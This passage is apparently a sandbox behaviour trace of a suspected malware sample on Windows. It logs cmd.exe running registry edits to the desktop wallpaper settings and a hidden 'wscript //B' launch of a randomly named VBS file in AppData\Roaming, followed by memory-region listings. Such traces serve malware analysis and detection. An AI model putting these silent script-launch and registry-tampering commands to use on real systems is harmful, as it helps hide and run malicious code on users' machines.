_String2="COMPUTE", _MaxCount=0x7) returned 3 [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0203.295] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0203.295] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0203.295] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0203.295] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0203.295] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0203.295] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0203.295] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0203.295] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0203.295] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0203.295] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0203.295] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0203.295] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0203.295] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0203.295] lstrcmpW (lpString1="\\reg.exe", lpString2="\\XCOPY.EXE") returned -1 [0203.295] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\reg.exe", lpCommandLine="reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x115ee20*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x115ee6c | out: lpCommandLine="reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f ", lpProcessInformation=0x115ee6c*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x348, dwThreadId=0x324)) returned 1 [0203.303] CloseHandle (hObject=0xa8) returned 1 [0203.303] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0203.303] GetEnvironmentStringsW () returned 0x12082c0* [0203.303] FreeEnvironmentStringsA (penv="=") returned 1 [0203.303] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0203.543] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0x115ee04 | out: lpExitCode=0x115ee04*=0x0) returned 1 [0203.543] CloseHandle (hObject=0xa4) returned 1 [0203.543] _vsnwprintf (in: _Buffer=0x115eeec, _BufferCount=0x13, _Format="%08X", _ArgList=0x115ee0c | out: _Buffer="00000000") returned 8 [0203.543] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0203.543] GetEnvironmentStringsW () returned 0x12082c0* [0203.543] FreeEnvironmentStringsA (penv="=") returned 1 [0203.543] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0203.543] GetEnvironmentStringsW () returned 0x12082c0* [0203.543] FreeEnvironmentStringsA (penv="=") returned 1 [0203.543] DeleteProcThreadAttributeList (in: lpAttributeList=0x115ee98 | out: lpAttributeList=0x115ee98) [0203.543] GetConsoleTitleW (in: lpConsoleTitle=0x115f1e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.544] _wcsicmp (_String1="reg", _String2="DIR") returned 14 [0203.544] _wcsicmp (_String1="reg", _String2="ERASE") returned 13 [0203.544] _wcsicmp (_String1="reg", _String2="DEL") returned 14 [0203.544] _wcsicmp (_String1="reg", _String2="TYPE") returned -2 [0203.544] _wcsicmp (_String1="reg", _String2="COPY") returned 15 [0203.544] _wcsicmp (_String1="reg", _String2="CD") returned 15 [0203.544] _wcsicmp (_String1="reg", _String2="CHDIR") returned 15 [0203.544] _wcsicmp (_String1="reg", _String2="RENAME") returned -7 [0203.544] _wcsicmp (_String1="reg", _String2="REN") returned -7 [0203.544] _wcsicmp (_String1="reg", _String2="ECHO") returned 13 [0203.544] _wcsicmp (_String1="reg", _String2="SET") returned -1 [0203.544] _wcsicmp (_String1="reg", _String2="PAUSE") returned 2 [0203.544] _wcsicmp (_String1="reg", _String2="DATE") returned 14 [0203.545] _wcsicmp (_String1="reg", _String2="TIME") returned -2 [0203.545] _wcsicmp (_String1="reg", _String2="PROMPT") returned 2 [0203.545] _wcsicmp (_String1="reg", _String2="MD") returned 5 [0203.545] _wcsicmp (_String1="reg", _String2="MKDIR") returned 5 [0203.545] _wcsicmp (_String1="reg", _String2="RD") returned 1 [0203.545] _wcsicmp (_String1="reg", _String2="RMDIR") returned -8 [0203.545] _wcsicmp (_String1="reg", _String2="PATH") returned 2 [0203.545] _wcsicmp (_String1="reg", _String2="GOTO") returned 11 [0203.545] _wcsicmp (_String1="reg", _String2="SHIFT") returned -1 [0203.545] _wcsicmp (_String1="reg", _String2="CLS") returned 15 [0203.545] _wcsicmp (_String1="reg", _String2="CALL") returned 15 [0203.545] _wcsicmp (_String1="reg", _String2="VERIFY") returned -4 [0203.545] _wcsicmp (_String1="reg", _String2="VER") returned -4 [0203.545] _wcsicmp (_String1="reg", _String2="VOL") returned -4 [0203.545] _wcsicmp (_String1="reg", _String2="EXIT") returned 13 [0203.545] _wcsicmp (_String1="reg", _String2="SETLOCAL") returned -1 [0203.545] _wcsicmp (_String1="reg", _String2="ENDLOCAL") returned 13 [0203.545] _wcsicmp (_String1="reg", _String2="TITLE") returned -2 [0203.545] _wcsicmp (_String1="reg", _String2="START") returned -1 [0203.545] _wcsicmp (_String1="reg", _String2="DPATH") returned 14 [0203.545] _wcsicmp (_String1="reg", _String2="KEYS") returned 7 [0203.545] _wcsicmp (_String1="reg", _String2="MOVE") returned 5 [0203.545] _wcsicmp (_String1="reg", _String2="PUSHD") returned 2 [0203.545] _wcsicmp (_String1="reg", _String2="POPD") returned 2 [0203.545] _wcsicmp (_String1="reg", _String2="ASSOC") returned 17 [0203.545] _wcsicmp (_String1="reg", _String2="FTYPE") returned 12 [0203.545] _wcsicmp (_String1="reg", _String2="BREAK") returned 16 [0203.545] _wcsicmp (_String1="reg", _String2="COLOR") returned 15 [0203.545] _wcsicmp (_String1="reg", _String2="MKLINK") returned 5 [0203.545] _wcsicmp (_String1="reg", _String2="DIR") returned 14 [0203.545] _wcsicmp (_String1="reg", _String2="ERASE") returned 13 [0203.545] _wcsicmp (_String1="reg", _String2="DEL") returned 14 [0203.545] _wcsicmp (_String1="reg", _String2="TYPE") returned -2 [0203.545] _wcsicmp (_String1="reg", _String2="COPY") returned 15 [0203.545] _wcsicmp (_String1="reg", _String2="CD") returned 15 [0203.545] _wcsicmp (_String1="reg", _String2="CHDIR") returned 15 [0203.545] _wcsicmp (_String1="reg", _String2="RENAME") returned -7 [0203.545] _wcsicmp (_String1="reg", _String2="REN") returned -7 [0203.545] _wcsicmp (_String1="reg", _String2="ECHO") returned 13 [0203.545] _wcsicmp (_String1="reg", _String2="SET") returned -1 [0203.545] _wcsicmp (_String1="reg", _String2="PAUSE") returned 2 [0203.545] _wcsicmp (_String1="reg", _String2="DATE") returned 14 [0203.546] _wcsicmp (_String1="reg", _String2="TIME") returned -2 [0203.546] _wcsicmp (_String1="reg", _String2="PROMPT") returned 2 [0203.546] _wcsicmp (_String1="reg", _String2="MD") returned 5 [0203.546] _wcsicmp (_String1="reg", _String2="MKDIR") returned 5 [0203.546] _wcsicmp (_String1="reg", _String2="RD") returned 1 [0203.546] _wcsicmp (_String1="reg", _String2="RMDIR") returned -8 [0203.546] _wcsicmp (_String1="reg", _String2="PATH") returned 2 [0203.546] _wcsicmp (_String1="reg", _String2="GOTO") returned 11 [0203.546] _wcsicmp (_String1="reg", _String2="SHIFT") returned -1 [0203.546] _wcsicmp (_String1="reg", _String2="CLS") returned 15 [0203.546] _wcsicmp (_String1="reg", _String2="CALL") returned 15 [0203.546] _wcsicmp (_String1="reg", _String2="VERIFY") returned -4 [0203.546] _wcsicmp (_String1="reg", _String2="VER") returned -4 [0203.546] _wcsicmp (_String1="reg", _String2="VOL") returned -4 [0203.546] _wcsicmp (_String1="reg", _String2="EXIT") returned 13 [0203.546] _wcsicmp (_String1="reg", _String2="SETLOCAL") returned -1 [0203.546] _wcsicmp (_String1="reg", _String2="ENDLOCAL") returned 13 [0203.546] _wcsicmp (_String1="reg", _String2="TITLE") returned -2 [0203.546] _wcsicmp (_String1="reg", _String2="START") returned -1 [0203.546] _wcsicmp (_String1="reg", _String2="DPATH") returned 14 [0203.546] _wcsicmp (_String1="reg", _String2="KEYS") returned 7 [0203.546] _wcsicmp (_String1="reg", _String2="MOVE") returned 5 [0203.546] _wcsicmp (_String1="reg", _String2="PUSHD") returned 2 [0203.546] _wcsicmp (_String1="reg", _String2="POPD") returned 2 [0203.546] _wcsicmp (_String1="reg", _String2="ASSOC") returned 17 [0203.546] _wcsicmp (_String1="reg", _String2="FTYPE") returned 12 [0203.546] _wcsicmp (_String1="reg", _String2="BREAK") returned 16 [0203.546] _wcsicmp (_String1="reg", _String2="COLOR") returned 15 [0203.546] _wcsicmp (_String1="reg", _String2="MKLINK") returned 5 [0203.546] _wcsicmp (_String1="reg", _String2="FOR") returned 12 [0203.546] _wcsicmp (_String1="reg", _String2="IF") returned 9 [0203.546] _wcsicmp (_String1="reg", _String2="REM") returned -6 [0203.546] _wcsnicmp (_String1="reg", _String2="cmd ", _MaxCount=0x4) returned 15 [0203.546] SetErrorMode (uMode=0x0) returned 0x0 [0203.546] SetErrorMode (uMode=0x1) returned 0x0 [0203.547] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x120a218, lpFilePart=0x115ecec | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x115ecec*="Desktop") returned 0x1d [0203.547] SetErrorMode (uMode=0x0) returned 0x1 [0203.547] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0203.547] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0203.547] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.547] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.547] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x115ea78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x115ea78) returned 0xffffffff [0203.547] GetLastError () returned 0x2 [0203.547] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.547] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x115ea78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x115ea78) returned 0xffffffff [0203.548] GetLastError () returned 0x2 [0203.548] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.548] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x115ea78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x115ea78) returned 0x120bf98 [0203.548] FindClose (in: hFindFile=0x120bf98 | out: hFindFile=0x120bf98) returned 1 [0203.548] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.COM", fInfoLevelId=0x1, lpFindFileData=0x115ea78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x115ea78) returned 0xffffffff [0203.548] GetLastError () returned 0x2 [0203.548] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.EXE", fInfoLevelId=0x1, lpFindFileData=0x115ea78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x115ea78) returned 0x120bf98 [0203.548] FindClose (in: hFindFile=0x120bf98 | out: hFindFile=0x120bf98) returned 1 [0203.548] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0203.548] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0203.548] GetConsoleTitleW (in: lpConsoleTitle=0x115ef6c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.549] InitializeProcThreadAttributeList (in: lpAttributeList=0x115ee98, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x115ee7c | out: lpAttributeList=0x115ee98, lpSize=0x115ee7c) returned 1 [0203.549] UpdateProcThreadAttribute (in: lpAttributeList=0x115ee98, dwFlags=0x0, Attribute=0x60001, lpValue=0x115ee84, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x115ee98, lpPreviousValue=0x0) returned 1 [0203.549] GetStartupInfoW (in: lpStartupInfo=0x115eed0 | out: lpStartupInfo=0x115eed0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0203.549] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0203.550] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0203.550] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0203.550] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0203.550] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0203.550] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0203.550] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0203.550] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0203.550] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0203.550] lstrcmpW (lpString1="\\reg.exe", lpString2="\\XCOPY.EXE") returned -1 [0203.550] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\reg.exe", lpCommandLine="reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t REG_SZ /d \"0\" /f", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x115ee20*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t REG_SZ /d \"0\" /f", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x115ee6c | out: lpCommandLine="reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t REG_SZ /d \"0\" /f", lpProcessInformation=0x115ee6c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x374, dwThreadId=0x290)) returned 1 [0203.555] CloseHandle (hObject=0xa4) returned 1 [0203.555] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0203.555] GetEnvironmentStringsW () returned 0x12082c0* [0203.556] FreeEnvironmentStringsA (penv="=") returned 1 [0203.556] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0206.134] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x115ee04 | out: lpExitCode=0x115ee04*=0x0) returned 1 [0206.134] CloseHandle (hObject=0xa8) returned 1 [0206.134] _vsnwprintf (in: _Buffer=0x115eeec, _BufferCount=0x13, _Format="%08X", _ArgList=0x115ee0c | out: _Buffer="00000000") returned 8 [0206.134] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0206.134] GetEnvironmentStringsW () returned 0x12082c0* [0206.134] FreeEnvironmentStringsA (penv="=") returned 1 [0206.134] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0206.134] GetEnvironmentStringsW () returned 0x12082c0* [0206.134] FreeEnvironmentStringsA (penv="=") returned 1 [0206.134] DeleteProcThreadAttributeList (in: lpAttributeList=0x115ee98 | out: lpAttributeList=0x115ee98) [0206.134] _get_osfhandle (_FileHandle=1) returned 0x3c [0206.134] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0206.135] _get_osfhandle (_FileHandle=1) returned 0x3c [0206.135] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0206.135] _get_osfhandle (_FileHandle=0) returned 0x38 [0206.135] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0206.140] SetConsoleInputExeNameW () returned 0x1 [0206.140] GetConsoleOutputCP () returned 0x1b5 [0206.140] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0206.140] SetThreadUILanguage (LangId=0x0) returned 0x409 [0206.140] exit (_Code=0) Thread: id = 108 os_tid = 0xff0 Process: id = "8" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x7273e000" os_pid = "0xfa4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xbd0" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C wscript //B //Nologo \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MuA3C6WI.vbs\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 820 start_va = 0x400000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 821 start_va = 0x420000 end_va = 0x421fff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 822 start_va = 0x430000 end_va = 0x443fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 823 start_va = 0x450000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 824 start_va = 0x490000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 825 start_va = 0x590000 end_va = 0x593fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 826 start_va = 0x5a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 827 start_va = 0x5b0000 end_va = 0x5b1fff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 828 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 829 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 830 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 831 start_va = 0x7e3b0000 end_va = 0x7e3d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e3b0000" filename = "" Region: id = 832 start_va = 0x7e3d3000 end_va = 0x7e3d3fff entry_point = 0x0 region_type = private name = "private_0x000000007e3d3000" filename = "" Region: id = 833 start_va = 0x7e3dc000 end_va = 0x7e3defff entry_point = 0x0 region_type = private name = "private_0x000000007e3dc000" filename = "" Region: id = 834 start_va = 0x7e3df000 end_va = 0x7e3dffff entry_point = 0x0 region_type = private name = "private_0x000000007e3df000" filename = "" Region: id = 835 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 836 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 837 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 838 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 839 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 845 start_va = 0x5e0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 846 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 847 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 848 start_va = 0x610000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 849 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 954 start_va = 0x400000 end_va = 0x40ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 955 start_va = 0x710000 end_va = 0x7cdfff entry_point = 0x710000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 956 start_va = 0x7d0000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 957 start_va = 0x810000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 958 start_va = 0xaa0000 end_va = 0xaaffff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename 